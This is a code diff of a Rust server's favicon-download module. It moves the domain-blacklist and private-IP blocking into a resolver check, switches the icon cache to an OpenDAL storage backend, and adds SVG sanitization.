@@ -103,17 +108,21 @@ async fn icon_redirect(domain: &str, template: &str) -> Option<Redirect> {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
#[get("/<domain>/icon.png")]
|
|
||||||
async fn icon_external(domain: &str) -> Option<Redirect> {
|
|
||||||
icon_redirect(domain, &CONFIG._icon_service_url()).await
|
|
||||||
}
|
|
||||||
|
|
||||||
#[get("/<domain>/icon.png")]
|
#[get("/<domain>/icon.png")]
|
||||||
async fn icon_internal(domain: &str) -> Cached<(ContentType, Vec<u8>)> {
|
async fn icon_internal(domain: &str) -> Cached<(ContentType, Vec<u8>)> {
|
||||||
const FALLBACK_ICON: &[u8] = include_bytes!("../static/images/fallback-icon.png");
|
const FALLBACK_ICON: &[u8] = include_bytes!("../static/images/fallback-icon.png");
|
||||||
|
|
||||||
if !is_valid_domain(domain) {
|
if !is_valid_domain(domain) {
|
||||||
warn!("Invalid domain: {}", domain);
|
warn!("Invalid domain: {domain}");
|
||||||
|
return Cached::ttl(
|
||||||
|
(ContentType::new("image", "png"), FALLBACK_ICON.to_vec()),
|
||||||
|
CONFIG.icon_cache_negttl(),
|
||||||
|
true,
|
||||||
|
);
|
||||||
|
}
|
||||||
|
|
||||||
|
if should_block_address(domain) {
|
||||||
|
warn!("Blocked address: {domain}");
|
||||||
return Cached::ttl(
|
return Cached::ttl(
|
||||||
(ContentType::new("image", "png"), FALLBACK_ICON.to_vec()),
|
(ContentType::new("image", "png"), FALLBACK_ICON.to_vec()),
|
||||||
CONFIG.icon_cache_negttl(),
|
CONFIG.icon_cache_negttl(),
|
||||||
@@ -138,7 +147,7 @@ fn is_valid_domain(domain: &str) -> bool {
|
|||||||
|
|
||||||
// If parsing the domain fails using Url, it will not work with reqwest.
|
// If parsing the domain fails using Url, it will not work with reqwest.
|
||||||
if let Err(parse_error) = url::Url::parse(format!("https://{domain}").as_str()) {
|
if let Err(parse_error) = url::Url::parse(format!("https://{domain}").as_str()) {
|
||||||
debug!("Domain parse error: '{}' - {:?}", domain, parse_error);
|
debug!("Domain parse error: '{domain}' - {parse_error:?}");
|
||||||
return false;
|
return false;
|
||||||
} else if domain.is_empty()
|
} else if domain.is_empty()
|
||||||
|| domain.contains("..")
|
|| domain.contains("..")
|
||||||
@@ -147,18 +156,17 @@ fn is_valid_domain(domain: &str) -> bool {
|
|||||||
|| domain.ends_with('-')
|
|| domain.ends_with('-')
|
||||||
{
|
{
|
||||||
debug!(
|
debug!(
|
||||||
"Domain validation error: '{}' is either empty, contains '..', starts with an '.', starts or ends with a '-'",
|
"Domain validation error: '{domain}' is either empty, contains '..', starts with an '.', starts or ends with a '-'"
|
||||||
domain
|
|
||||||
);
|
);
|
||||||
return false;
|
return false;
|
||||||
} else if domain.len() > 255 {
|
} else if domain.len() > 255 {
|
||||||
debug!("Domain validation error: '{}' exceeds 255 characters", domain);
|
debug!("Domain validation error: '{domain}' exceeds 255 characters");
|
||||||
return false;
|
return false;
|
||||||
}
|
}
|
||||||
|
|
||||||
for c in domain.chars() {
|
for c in domain.chars() {
|
||||||
if !c.is_alphanumeric() && !ALLOWED_CHARS.contains(c) {
|
if !c.is_alphanumeric() && !ALLOWED_CHARS.contains(c) {
|
||||||
debug!("Domain validation error: '{}' contains an invalid character '{}'", domain, c);
|
debug!("Domain validation error: '{domain}' contains an invalid character '{c}'");
|
||||||
return false;
|
return false;
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
@@ -166,157 +174,8 @@ fn is_valid_domain(domain: &str) -> bool {
|
|||||||
true
|
true
|
||||||
}
|
}
|
||||||
|
|
||||||
/// TODO: This is extracted from IpAddr::is_global, which is unstable:
|
|
||||||
/// https://doc.rust-lang.org/nightly/std/net/enum.IpAddr.html#method.is_global
|
|
||||||
/// Remove once https://github.com/rust-lang/rust/issues/27709 is merged
|
|
||||||
#[allow(clippy::nonminimal_bool)]
|
|
||||||
#[cfg(not(feature = "unstable"))]
|
|
||||||
fn is_global(ip: IpAddr) -> bool {
|
|
||||||
match ip {
|
|
||||||
IpAddr::V4(ip) => {
|
|
||||||
// check if this address is 192.0.0.9 or 192.0.0.10. These addresses are the only two
|
|
||||||
// globally routable addresses in the 192.0.0.0/24 range.
|
|
||||||
if u32::from(ip) == 0xc0000009 || u32::from(ip) == 0xc000000a {
|
|
||||||
return true;
|
|
||||||
}
|
|
||||||
!ip.is_private()
|
|
||||||
&& !ip.is_loopback()
|
|
||||||
&& !ip.is_link_local()
|
|
||||||
&& !ip.is_broadcast()
|
|
||||||
&& !ip.is_documentation()
|
|
||||||
&& !(ip.octets()[0] == 100 && (ip.octets()[1] & 0b1100_0000 == 0b0100_0000))
|
|
||||||
&& !(ip.octets()[0] == 192 && ip.octets()[1] == 0 && ip.octets()[2] == 0)
|
|
||||||
&& !(ip.octets()[0] & 240 == 240 && !ip.is_broadcast())
|
|
||||||
&& !(ip.octets()[0] == 198 && (ip.octets()[1] & 0xfe) == 18)
|
|
||||||
// Make sure the address is not in 0.0.0.0/8
|
|
||||||
&& ip.octets()[0] != 0
|
|
||||||
}
|
|
||||||
IpAddr::V6(ip) => {
|
|
||||||
if ip.is_multicast() && ip.segments()[0] & 0x000f == 14 {
|
|
||||||
true
|
|
||||||
} else {
|
|
||||||
!ip.is_multicast()
|
|
||||||
&& !ip.is_loopback()
|
|
||||||
&& !((ip.segments()[0] & 0xffc0) == 0xfe80)
|
|
||||||
&& !((ip.segments()[0] & 0xfe00) == 0xfc00)
|
|
||||||
&& !ip.is_unspecified()
|
|
||||||
&& !((ip.segments()[0] == 0x2001) && (ip.segments()[1] == 0xdb8))
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
#[cfg(feature = "unstable")]
|
|
||||||
fn is_global(ip: IpAddr) -> bool {
|
|
||||||
ip.is_global()
|
|
||||||
}
|
|
||||||
|
|
||||||
/// These are some tests to check that the implementations match
|
|
||||||
/// The IPv4 can be all checked in 5 mins or so and they are correct as of nightly 2020-07-11
|
|
||||||
/// The IPV6 can't be checked in a reasonable time, so we check about ten billion random ones, so far correct
|
|
||||||
/// Note that the is_global implementation is subject to change as new IP RFCs are created
|
|
||||||
///
|
|
||||||
/// To run while showing progress output:
|
|
||||||
/// cargo test --features sqlite,unstable -- --nocapture --ignored
|
|
||||||
#[cfg(test)]
|
|
||||||
#[cfg(feature = "unstable")]
|
|
||||||
mod tests {
|
|
||||||
use super::*;
|
|
||||||
|
|
||||||
#[test]
|
|
||||||
#[ignore]
|
|
||||||
fn test_ipv4_global() {
|
|
||||||
for a in 0..u8::MAX {
|
|
||||||
println!("Iter: {}/255", a);
|
|
||||||
for b in 0..u8::MAX {
|
|
||||||
for c in 0..u8::MAX {
|
|
||||||
for d in 0..u8::MAX {
|
|
||||||
let ip = IpAddr::V4(std::net::Ipv4Addr::new(a, b, c, d));
|
|
||||||
assert_eq!(ip.is_global(), is_global(ip))
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
#[test]
|
|
||||||
#[ignore]
|
|
||||||
fn test_ipv6_global() {
|
|
||||||
use ring::rand::{SecureRandom, SystemRandom};
|
|
||||||
let mut v = [0u8; 16];
|
|
||||||
let rand = SystemRandom::new();
|
|
||||||
for i in 0..1_000 {
|
|
||||||
println!("Iter: {}/1_000", i);
|
|
||||||
for _ in 0..10_000_000 {
|
|
||||||
rand.fill(&mut v).expect("Error generating random values");
|
|
||||||
let ip = IpAddr::V6(std::net::Ipv6Addr::new(
|
|
||||||
(v[14] as u16) << 8 | v[15] as u16,
|
|
||||||
(v[12] as u16) << 8 | v[13] as u16,
|
|
||||||
(v[10] as u16) << 8 | v[11] as u16,
|
|
||||||
(v[8] as u16) << 8 | v[9] as u16,
|
|
||||||
(v[6] as u16) << 8 | v[7] as u16,
|
|
||||||
(v[4] as u16) << 8 | v[5] as u16,
|
|
||||||
(v[2] as u16) << 8 | v[3] as u16,
|
|
||||||
(v[0] as u16) << 8 | v[1] as u16,
|
|
||||||
));
|
|
||||||
assert_eq!(ip.is_global(), is_global(ip))
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
#[derive(Clone)]
|
|
||||||
enum DomainBlacklistReason {
|
|
||||||
Regex,
|
|
||||||
IP,
|
|
||||||
}
|
|
||||||
|
|
||||||
use cached::proc_macro::cached;
|
|
||||||
#[cached(key = "String", convert = r#"{ domain.to_string() }"#, size = 16, time = 60)]
|
|
||||||
async fn check_domain_blacklist_reason(domain: &str) -> Option<DomainBlacklistReason> {
|
|
||||||
// First check the blacklist regex if there is a match.
|
|
||||||
// This prevents the blocked domain(s) from being leaked via a DNS lookup.
|
|
||||||
if let Some(blacklist) = CONFIG.icon_blacklist_regex() {
|
|
||||||
// Use the pre-generate Regex stored in a Lazy HashMap if there's one, else generate it.
|
|
||||||
let is_match = if let Some(regex) = ICON_BLACKLIST_REGEX.get(&blacklist) {
|
|
||||||
regex.is_match(domain)
|
|
||||||
} else {
|
|
||||||
// Clear the current list if the previous key doesn't exists.
|
|
||||||
// To prevent growing of the HashMap after someone has changed it via the admin interface.
|
|
||||||
if ICON_BLACKLIST_REGEX.len() >= 1 {
|
|
||||||
ICON_BLACKLIST_REGEX.clear();
|
|
||||||
}
|
|
||||||
|
|
||||||
// Generate the regex to store in too the Lazy Static HashMap.
|
|
||||||
let blacklist_regex = Regex::new(&blacklist).unwrap();
|
|
||||||
let is_match = blacklist_regex.is_match(domain);
|
|
||||||
ICON_BLACKLIST_REGEX.insert(blacklist.clone(), blacklist_regex);
|
|
||||||
|
|
||||||
is_match
|
|
||||||
};
|
|
||||||
|
|
||||||
if is_match {
|
|
||||||
debug!("Blacklisted domain: {} matched ICON_BLACKLIST_REGEX", domain);
|
|
||||||
return Some(DomainBlacklistReason::Regex);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
if CONFIG.icon_blacklist_non_global_ips() {
|
|
||||||
if let Ok(s) = lookup_host((domain, 0)).await {
|
|
||||||
for addr in s {
|
|
||||||
if !is_global(addr.ip()) {
|
|
||||||
debug!("IP {} for domain '{}' is not a global IP!", addr.ip(), domain);
|
|
||||||
return Some(DomainBlacklistReason::IP);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
None
|
|
||||||
}
|
|
||||||
|
|
||||||
async fn get_icon(domain: &str) -> Option<(Vec<u8>, String)> {
|
async fn get_icon(domain: &str) -> Option<(Vec<u8>, String)> {
|
||||||
let path = format!("{}/{}.png", CONFIG.icon_cache_folder(), domain);
|
let path = format!("{domain}.png");
|
||||||
|
|
||||||
// Check for expiration of negatively cached copy
|
// Check for expiration of negatively cached copy
|
||||||
if icon_is_negcached(&path).await {
|
if icon_is_negcached(&path).await {
|
||||||
@@ -324,10 +183,7 @@ async fn get_icon(domain: &str) -> Option<(Vec<u8>, String)> {
|
|||||||
}
|
}
|
||||||
|
|
||||||
if let Some(icon) = get_cached_icon(&path).await {
|
if let Some(icon) = get_cached_icon(&path).await {
|
||||||
let icon_type = match get_icon_type(&icon) {
|
let icon_type = get_icon_type(&icon).unwrap_or("x-icon");
|
||||||
Some(x) => x,
|
|
||||||
_ => "x-icon",
|
|
||||||
};
|
|
||||||
return Some((icon, icon_type.to_string()));
|
return Some((icon, icon_type.to_string()));
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -338,13 +194,20 @@ async fn get_icon(domain: &str) -> Option<(Vec<u8>, String)> {
|
|||||||
// Get the icon, or None in case of error
|
// Get the icon, or None in case of error
|
||||||
match download_icon(domain).await {
|
match download_icon(domain).await {
|
||||||
Ok((icon, icon_type)) => {
|
Ok((icon, icon_type)) => {
|
||||||
save_icon(&path, &icon).await;
|
save_icon(&path, icon.to_vec()).await;
|
||||||
Some((icon.to_vec(), icon_type.unwrap_or("x-icon").to_string()))
|
Some((icon.to_vec(), icon_type.unwrap_or("x-icon").to_string()))
|
||||||
}
|
}
|
||||||
Err(e) => {
|
Err(e) => {
|
||||||
warn!("Unable to download icon: {:?}", e);
|
// If this error comes from the custom resolver, this means this is a blocked domain
|
||||||
|
// or non global IP, don't save the miss file in this case to avoid leaking it
|
||||||
|
if let Some(error) = CustomHttpClientError::downcast_ref(&e) {
|
||||||
|
warn!("{error}");
|
||||||
|
return None;
|
||||||
|
}
|
||||||
|
|
||||||
|
warn!("Unable to download icon: {e:?}");
|
||||||
let miss_indicator = path + ".miss";
|
let miss_indicator = path + ".miss";
|
||||||
save_icon(&miss_indicator, &[]).await;
|
save_icon(&miss_indicator, vec![]).await;
|
||||||
None
|
None
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
@@ -357,11 +220,9 @@ async fn get_cached_icon(path: &str) -> Option<Vec<u8>> {
|
|||||||
}
|
}
|
||||||
|
|
||||||
// Try to read the cached icon, and return it if it exists
|
// Try to read the cached icon, and return it if it exists
|
||||||
if let Ok(mut f) = File::open(path).await {
|
if let Ok(operator) = CONFIG.opendal_operator_for_path_type(PathType::IconCache) {
|
||||||
let mut buffer = Vec::new();
|
if let Ok(buf) = operator.read(path).await {
|
||||||
|
return Some(buf.to_vec());
|
||||||
if f.read_to_end(&mut buffer).await.is_ok() {
|
|
||||||
return Some(buffer);
|
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -369,9 +230,11 @@ async fn get_cached_icon(path: &str) -> Option<Vec<u8>> {
|
|||||||
}
|
}
|
||||||
|
|
||||||
async fn file_is_expired(path: &str, ttl: u64) -> Result<bool, Error> {
|
async fn file_is_expired(path: &str, ttl: u64) -> Result<bool, Error> {
|
||||||
let meta = symlink_metadata(path).await?;
|
let operator = CONFIG.opendal_operator_for_path_type(PathType::IconCache)?;
|
||||||
let modified = meta.modified()?;
|
let meta = operator.stat(path).await?;
|
||||||
let age = SystemTime::now().duration_since(modified)?;
|
let modified =
|
||||||
|
meta.last_modified().ok_or_else(|| std::io::Error::other(format!("No last modified time for `{path}`")))?;
|
||||||
|
let age = SystemTime::now().duration_since(modified.into())?;
|
||||||
|
|
||||||
Ok(ttl > 0 && ttl <= age.as_secs())
|
Ok(ttl > 0 && ttl <= age.as_secs())
|
||||||
}
|
}
|
||||||
@@ -383,8 +246,13 @@ async fn icon_is_negcached(path: &str) -> bool {
|
|||||||
match expired {
|
match expired {
|
||||||
// No longer negatively cached, drop the marker
|
// No longer negatively cached, drop the marker
|
||||||
Ok(true) => {
|
Ok(true) => {
|
||||||
if let Err(e) = remove_file(&miss_indicator).await {
|
match CONFIG.opendal_operator_for_path_type(PathType::IconCache) {
|
||||||
error!("Could not remove negative cache indicator for icon {:?}: {:?}", path, e);
|
Ok(operator) => {
|
||||||
|
if let Err(e) = operator.delete(&miss_indicator).await {
|
||||||
|
error!("Could not remove negative cache indicator for icon {path:?}: {e:?}");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
Err(e) => error!("Could not remove negative cache indicator for icon {path:?}: {e:?}"),
|
||||||
}
|
}
|
||||||
false
|
false
|
||||||
}
|
}
|
||||||
@@ -414,11 +282,7 @@ impl Icon {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
fn get_favicons_node(
|
fn get_favicons_node(dom: Tokenizer<StringReader<'_>, FaviconEmitter>, icons: &mut Vec<Icon>, url: &url::Url) {
|
||||||
dom: InfallibleTokenizer<StringReader<'_>, FaviconEmitter>,
|
|
||||||
icons: &mut Vec<Icon>,
|
|
||||||
url: &url::Url,
|
|
||||||
) {
|
|
||||||
const TAG_LINK: &[u8] = b"link";
|
const TAG_LINK: &[u8] = b"link";
|
||||||
const TAG_BASE: &[u8] = b"base";
|
const TAG_BASE: &[u8] = b"base";
|
||||||
const TAG_HEAD: &[u8] = b"head";
|
const TAG_HEAD: &[u8] = b"head";
|
||||||
@@ -427,7 +291,7 @@ fn get_favicons_node(
|
|||||||
|
|
||||||
let mut base_url = url.clone();
|
let mut base_url = url.clone();
|
||||||
let mut icon_tags: Vec<Tag> = Vec::new();
|
let mut icon_tags: Vec<Tag> = Vec::new();
|
||||||
for token in dom {
|
for Ok(token) in dom {
|
||||||
let tag_name: &[u8] = &token.tag.name;
|
let tag_name: &[u8] = &token.tag.name;
|
||||||
match tag_name {
|
match tag_name {
|
||||||
TAG_LINK => {
|
TAG_LINK => {
|
||||||
@@ -448,9 +312,7 @@ fn get_favicons_node(
|
|||||||
TAG_HEAD if token.closing => {
|
TAG_HEAD if token.closing => {
|
||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
_ => {
|
_ => {}
|
||||||
continue;
|
|
||||||
}
|
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -476,7 +338,7 @@ struct IconUrlResult {
|
|||||||
|
|
||||||
/// Returns a IconUrlResult which holds a Vector IconList and a string which holds the referer.
|
/// Returns a IconUrlResult which holds a Vector IconList and a string which holds the referer.
|
||||||
/// There will always two items within the iconlist which holds http(s)://domain.tld/favicon.ico.
|
/// There will always two items within the iconlist which holds http(s)://domain.tld/favicon.ico.
|
||||||
/// This does not mean that that location does exists, but it is the default location browser use.
|
/// This does not mean that location exists, but (it) is the default location the browser uses.
|
||||||
///
|
///
|
||||||
/// # Argument
|
/// # Argument
|
||||||
/// * `domain` - A string which holds the domain with extension.
|
/// * `domain` - A string which holds the domain with extension.
|
||||||
@@ -491,42 +353,48 @@ async fn get_icon_url(domain: &str) -> Result<IconUrlResult, Error> {
|
|||||||
let ssldomain = format!("https://{domain}");
|
let ssldomain = format!("https://{domain}");
|
||||||
let httpdomain = format!("http://{domain}");
|
let httpdomain = format!("http://{domain}");
|
||||||
|
|
||||||
// First check the domain as given during the request for both HTTPS and HTTP.
|
// First check the domain as given during the request for HTTPS.
|
||||||
let resp = match get_page(&ssldomain).or_else(|_| get_page(&httpdomain)).await {
|
let resp = match get_page(&ssldomain).await {
|
||||||
Ok(c) => Ok(c),
|
Err(e) if CustomHttpClientError::downcast_ref(&e).is_none() => {
|
||||||
Err(e) => {
|
// If we get an error that is not caused by the blacklist, we retry with HTTP
|
||||||
let mut sub_resp = Err(e);
|
match get_page(&httpdomain).await {
|
||||||
|
mut sub_resp @ Err(_) => {
|
||||||
|
// When the domain is not an IP, and has more then one dot, remove all subdomains.
|
||||||
|
let is_ip = domain.parse::<IpAddr>();
|
||||||
|
if is_ip.is_err() && domain.matches('.').count() > 1 {
|
||||||
|
let mut domain_parts = domain.split('.');
|
||||||
|
let base_domain = format!(
|
||||||
|
"{base}.{tld}",
|
||||||
|
tld = domain_parts.next_back().unwrap(),
|
||||||
|
base = domain_parts.next_back().unwrap()
|
||||||
|
);
|
||||||
|
if is_valid_domain(&base_domain) {
|
||||||
|
let sslbase = format!("https://{base_domain}");
|
||||||
|
let httpbase = format!("http://{base_domain}");
|
||||||
|
debug!("[get_icon_url]: Trying without subdomains '{base_domain}'");
|
||||||
|
|
||||||
// When the domain is not an IP, and has more then one dot, remove all subdomains.
|
sub_resp = get_page(&sslbase).or_else(|_| get_page(&httpbase)).await;
|
||||||
let is_ip = domain.parse::<IpAddr>();
|
}
|
||||||
if is_ip.is_err() && domain.matches('.').count() > 1 {
|
|
||||||
let mut domain_parts = domain.split('.');
|
|
||||||
let base_domain = format!(
|
|
||||||
"{base}.{tld}",
|
|
||||||
tld = domain_parts.next_back().unwrap(),
|
|
||||||
base = domain_parts.next_back().unwrap()
|
|
||||||
);
|
|
||||||
if is_valid_domain(&base_domain) {
|
|
||||||
let sslbase = format!("https://{base_domain}");
|
|
||||||
let httpbase = format!("http://{base_domain}");
|
|
||||||
debug!("[get_icon_url]: Trying without subdomains '{base_domain}'");
|
|
||||||
|
|
||||||
sub_resp = get_page(&sslbase).or_else(|_| get_page(&httpbase)).await;
|
// When the domain is not an IP, and has less then 2 dots, try to add www. infront of it.
|
||||||
}
|
} else if is_ip.is_err() && domain.matches('.').count() < 2 {
|
||||||
|
let www_domain = format!("www.{domain}");
|
||||||
// When the domain is not an IP, and has less then 2 dots, try to add www. infront of it.
|
if is_valid_domain(&www_domain) {
|
||||||
} else if is_ip.is_err() && domain.matches('.').count() < 2 {
|
let sslwww = format!("https://{www_domain}");
|
||||||
let www_domain = format!("www.{domain}");
|
let httpwww = format!("http://{www_domain}");
|
||||||
if is_valid_domain(&www_domain) {
|
debug!("[get_icon_url]: Trying with www. prefix '{www_domain}'");
|
||||||
let sslwww = format!("https://{www_domain}");
|
|
||||||
let httpwww = format!("http://{www_domain}");
|
sub_resp = get_page(&sslwww).or_else(|_| get_page(&httpwww)).await;
|
||||||
debug!("[get_icon_url]: Trying with www. prefix '{www_domain}'");
|
}
|
||||||
|
}
|
||||||
sub_resp = get_page(&sslwww).or_else(|_| get_page(&httpwww)).await;
|
sub_resp
|
||||||
}
|
}
|
||||||
|
res => res,
|
||||||
}
|
}
|
||||||
sub_resp
|
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// If we get a result or a blacklist error, just continue
|
||||||
|
res => res,
|
||||||
};
|
};
|
||||||
|
|
||||||
// Create the iconlist
|
// Create the iconlist
|
||||||
@@ -548,7 +416,7 @@ async fn get_icon_url(domain: &str) -> Result<IconUrlResult, Error> {
|
|||||||
// 384KB should be more than enough for the HTML, though as we only really need the HTML header.
|
// 384KB should be more than enough for the HTML, though as we only really need the HTML header.
|
||||||
let limited_reader = stream_to_bytes_limit(content, 384 * 1024).await?.to_vec();
|
let limited_reader = stream_to_bytes_limit(content, 384 * 1024).await?.to_vec();
|
||||||
|
|
||||||
let dom = Tokenizer::new_with_emitter(limited_reader.to_reader(), FaviconEmitter::default()).infallible();
|
let dom = Tokenizer::new_with_emitter(limited_reader.to_reader(), FaviconEmitter::default());
|
||||||
get_favicons_node(dom, &mut iconlist, &url);
|
get_favicons_node(dom, &mut iconlist, &url);
|
||||||
} else {
|
} else {
|
||||||
// Add the default favicon.ico to the list with just the given domain
|
// Add the default favicon.ico to the list with just the given domain
|
||||||
@@ -573,21 +441,12 @@ async fn get_page(url: &str) -> Result<Response, Error> {
|
|||||||
}
|
}
|
||||||
|
|
||||||
async fn get_page_with_referer(url: &str, referer: &str) -> Result<Response, Error> {
|
async fn get_page_with_referer(url: &str, referer: &str) -> Result<Response, Error> {
|
||||||
match check_domain_blacklist_reason(url::Url::parse(url).unwrap().host_str().unwrap_or_default()).await {
|
|
||||||
Some(DomainBlacklistReason::Regex) => warn!("Favicon '{}' is from a blacklisted domain!", url),
|
|
||||||
Some(DomainBlacklistReason::IP) => warn!("Favicon '{}' is hosted on a non-global IP!", url),
|
|
||||||
None => (),
|
|
||||||
}
|
|
||||||
|
|
||||||
let mut client = CLIENT.get(url);
|
let mut client = CLIENT.get(url);
|
||||||
if !referer.is_empty() {
|
if !referer.is_empty() {
|
||||||
client = client.header("Referer", referer)
|
client = client.header("Referer", referer)
|
||||||
}
|
}
|
||||||
|
|
||||||
match client.send().await {
|
Ok(client.send().await?.error_for_status()?)
|
||||||
Ok(c) => c.error_for_status().map_err(Into::into),
|
|
||||||
Err(e) => err_silent!(format!("{e}")),
|
|
||||||
}
|
|
||||||
}
|
}
|
||||||
|
|
||||||
/// Returns a Integer with the priority of the type of the icon which to prefer.
|
/// Returns a Integer with the priority of the type of the icon which to prefer.
|
||||||
@@ -603,6 +462,9 @@ async fn get_page_with_referer(url: &str, referer: &str) -> Result<Response, Err
|
|||||||
/// priority2 = get_icon_priority("https://example.com/path/to/a/favicon.ico", "");
|
/// priority2 = get_icon_priority("https://example.com/path/to/a/favicon.ico", "");
|
||||||
/// ```
|
/// ```
|
||||||
fn get_icon_priority(href: &str, sizes: &str) -> u8 {
|
fn get_icon_priority(href: &str, sizes: &str) -> u8 {
|
||||||
|
static PRIORITY_MAP: Lazy<HashMap<&'static str, u8>> =
|
||||||
|
Lazy::new(|| [(".png", 10), (".jpg", 20), (".jpeg", 20)].into_iter().collect());
|
||||||
|
|
||||||
// Check if there is a dimension set
|
// Check if there is a dimension set
|
||||||
let (width, height) = parse_sizes(sizes);
|
let (width, height) = parse_sizes(sizes);
|
||||||
|
|
||||||
@@ -627,13 +489,9 @@ fn get_icon_priority(href: &str, sizes: &str) -> u8 {
|
|||||||
200
|
200
|
||||||
}
|
}
|
||||||
} else {
|
} else {
|
||||||
// Change priority by file extension
|
match href.rsplit_once('.') {
|
||||||
if href.ends_with(".png") {
|
Some((_, extension)) => PRIORITY_MAP.get(&*extension.to_ascii_lowercase()).copied().unwrap_or(30),
|
||||||
10
|
None => 30,
|
||||||
} else if href.ends_with(".jpg") || href.ends_with(".jpeg") {
|
|
||||||
20
|
|
||||||
} else {
|
|
||||||
30
|
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
@@ -670,12 +528,6 @@ fn parse_sizes(sizes: &str) -> (u16, u16) {
|
|||||||
}
|
}
|
||||||
|
|
||||||
async fn download_icon(domain: &str) -> Result<(Bytes, Option<&str>), Error> {
|
async fn download_icon(domain: &str) -> Result<(Bytes, Option<&str>), Error> {
|
||||||
match check_domain_blacklist_reason(domain).await {
|
|
||||||
Some(DomainBlacklistReason::Regex) => err_silent!("Domain is blacklisted", domain),
|
|
||||||
Some(DomainBlacklistReason::IP) => err_silent!("Host resolves to a non-global IP", domain),
|
|
||||||
None => (),
|
|
||||||
}
|
|
||||||
|
|
||||||
let icon_result = get_icon_url(domain).await?;
|
let icon_result = get_icon_url(domain).await?;
|
||||||
|
|
||||||
let mut buffer = Bytes::new();
|
let mut buffer = Bytes::new();
|
||||||
@@ -700,10 +552,10 @@ async fn download_icon(domain: &str) -> Result<(Bytes, Option<&str>), Error> {
|
|||||||
// Check if the icon type is allowed, else try an icon from the list.
|
// Check if the icon type is allowed, else try an icon from the list.
|
||||||
icon_type = get_icon_type(&body);
|
icon_type = get_icon_type(&body);
|
||||||
if icon_type.is_none() {
|
if icon_type.is_none() {
|
||||||
debug!("Icon from {} data:image uri, is not a valid image type", domain);
|
debug!("Icon from {domain} data:image uri, is not a valid image type");
|
||||||
continue;
|
continue;
|
||||||
}
|
}
|
||||||
info!("Extracted icon from data:image uri for {}", domain);
|
info!("Extracted icon from data:image uri for {domain}");
|
||||||
buffer = body.freeze();
|
buffer = body.freeze();
|
||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
@@ -711,47 +563,64 @@ async fn download_icon(domain: &str) -> Result<(Bytes, Option<&str>), Error> {
|
|||||||
_ => debug!("Extracted icon from data:image uri is invalid"),
|
_ => debug!("Extracted icon from data:image uri is invalid"),
|
||||||
};
|
};
|
||||||
} else {
|
} else {
|
||||||
match get_page_with_referer(&icon.href, &icon_result.referer).await {
|
let res = get_page_with_referer(&icon.href, &icon_result.referer).await?;
|
||||||
Ok(res) => {
|
|
||||||
buffer = stream_to_bytes_limit(res, 5120 * 1024).await?; // 5120KB/5MB for each icon max (Same as icons.bitwarden.net)
|
|
||||||
|
|
||||||
// Check if the icon type is allowed, else try an icon from the list.
|
buffer = stream_to_bytes_limit(res, 5120 * 1024).await?; // 5120KB/5MB for each icon max (Same as icons.bitwarden.net)
|
||||||
icon_type = get_icon_type(&buffer);
|
|
||||||
if icon_type.is_none() {
|
// Check if the icon type is allowed, else try an icon from the list.
|
||||||
buffer.clear();
|
icon_type = get_icon_type(&buffer);
|
||||||
debug!("Icon from {}, is not a valid image type", icon.href);
|
if icon_type.is_none() {
|
||||||
continue;
|
buffer.clear();
|
||||||
}
|
debug!("Icon from {}, is not a valid image type", icon.href);
|
||||||
info!("Downloaded icon from {}", icon.href);
|
continue;
|
||||||
break;
|
}
|
||||||
}
|
info!("Downloaded icon from {}", icon.href);
|
||||||
Err(e) => debug!("{:?}", e),
|
break;
|
||||||
};
|
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
if buffer.is_empty() {
|
if buffer.is_empty() {
|
||||||
err_silent!("Empty response or unable find a valid icon", domain);
|
err_silent!("Empty response or unable find a valid icon", domain);
|
||||||
|
} else if icon_type == Some("svg+xml") {
|
||||||
|
let mut svg_filter = Filter::new();
|
||||||
|
svg_filter.set_data_url_filter(data_url_filter::allow_standard_images);
|
||||||
|
let mut sanitized_svg = Vec::new();
|
||||||
|
if svg_filter.filter(&*buffer, &mut sanitized_svg).is_err() {
|
||||||
|
icon_type = None;
|
||||||
|
buffer.clear();
|
||||||
|
} else {
|
||||||
|
buffer = sanitized_svg.into();
|
||||||
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
Ok((buffer, icon_type))
|
Ok((buffer, icon_type))
|
||||||
}
|
}
|
||||||
|
|
||||||
async fn save_icon(path: &str, icon: &[u8]) {
|
async fn save_icon(path: &str, icon: Vec<u8>) {
|
||||||
match File::create(path).await {
|
let operator = match CONFIG.opendal_operator_for_path_type(PathType::IconCache) {
|
||||||
Ok(mut f) => {
|
Ok(operator) => operator,
|
||||||
f.write_all(icon).await.expect("Error writing icon file");
|
|
||||||
}
|
|
||||||
Err(ref e) if e.kind() == std::io::ErrorKind::NotFound => {
|
|
||||||
create_dir_all(&CONFIG.icon_cache_folder()).await.expect("Error creating icon cache folder");
|
|
||||||
}
|
|
||||||
Err(e) => {
|
Err(e) => {
|
||||||
warn!("Unable to save icon: {:?}", e);
|
warn!("Failed to get OpenDAL operator while saving icon: {e}");
|
||||||
|
return;
|
||||||
}
|
}
|
||||||
|
};
|
||||||
|
|
||||||
|
if let Err(e) = operator.write(path, icon).await {
|
||||||
|
warn!("Unable to save icon: {e:?}");
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
fn get_icon_type(bytes: &[u8]) -> Option<&'static str> {
|
fn get_icon_type(bytes: &[u8]) -> Option<&'static str> {
|
